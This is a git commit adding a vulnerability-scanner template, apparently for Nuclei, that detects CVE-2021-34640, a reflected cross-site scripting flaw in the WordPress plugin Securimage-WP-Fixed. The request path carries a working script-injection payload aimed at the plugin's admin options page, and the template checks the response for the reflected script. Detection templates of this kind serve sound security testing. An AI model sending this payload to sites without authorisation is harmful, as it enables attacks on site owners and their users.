Create CVE-2021-34640.yaml

patch-1
Dhiyaneshwaran 2021-09-29 04:03:06 +05:30 committed by GitHub
parent 699d3a72f9
commit a64419f576
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 30 additions and 0 deletions

View File

@ -0,0 +1,30 @@
id: CVE-2021-34640
info:
name: Securimage-WP-Fixed <= 3.5.4 - Reflected Cross-Site Scripting (XSS)
author: dhiyaneshDK
severity: medium
reference:
- https://wpscan.com/vulnerability/22017067-8675-4884-b976-d7f5a71279d2
tags: wordpress,cve,cve2021,wp-plugin
requests:
- method: GET
path:
- '{{BaseURL}}/wp-admin/options-general.php/"><script>alert(document.domain)</script>/script%3E?page=securimage-wp-options%2F'
matchers-condition: and
matchers:
- type: word
words:
- '<script>alert(document.domain)</script>'
part: body
- type: status
status:
- 200
- type: word
words:
- "text/html"
part: header